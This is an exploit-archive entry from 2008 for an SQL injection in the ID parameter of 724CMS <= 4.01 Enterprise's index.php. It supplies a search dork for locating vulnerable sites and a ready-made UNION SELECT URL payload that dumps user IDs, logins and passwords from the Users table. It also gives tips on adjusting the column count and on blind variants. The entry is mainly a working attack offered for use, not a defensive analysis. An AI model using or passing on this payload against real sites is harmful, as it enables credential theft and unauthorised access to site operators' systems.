724CMS <= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability

2008-04-07T00:00:00
ID 1337DAY-ID-2842
Type zdt
Reporter Lidloses_Auge
Modified 2008-04-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
724CMS <= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability
====================================================================




###################################################################################
#										  #
#           724CMS <= 4.01 Enterprise  - SQL Injection Vulnerability              #
#										  #
#    found by:       Lidloses_Auge 					          #
#    Date:           07.04.2008							  #
#										  #
###############################################################################################################################################
#																	      #
# Vulnerability:															      #
#																	      #
#    Document:      index.php														      #
#    GET-Parameter: ID														              #
#																	      #
# Dork:																	      #
#																	      #
#    724CMS + "Version 4.01"                    											      #
#																	      #
# Example:																      #
#																	      #
#    http://[target]/index.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x202d20,ID,User_Login,User_Password),13,14,	      #
#    15,16,17,18,19,20,21,22,23,24,25,26,27,28+FROM+Users--							                              #
#																	      #
# Notes:																      #
#																	      #
#    The number of columns isn't always 28. In some cases it can be also about 37. Check before you try. Some of 'em are blind injections.    #
#																	      #
###############################################################################################################################################



#  0day.today [2017-12-31]  #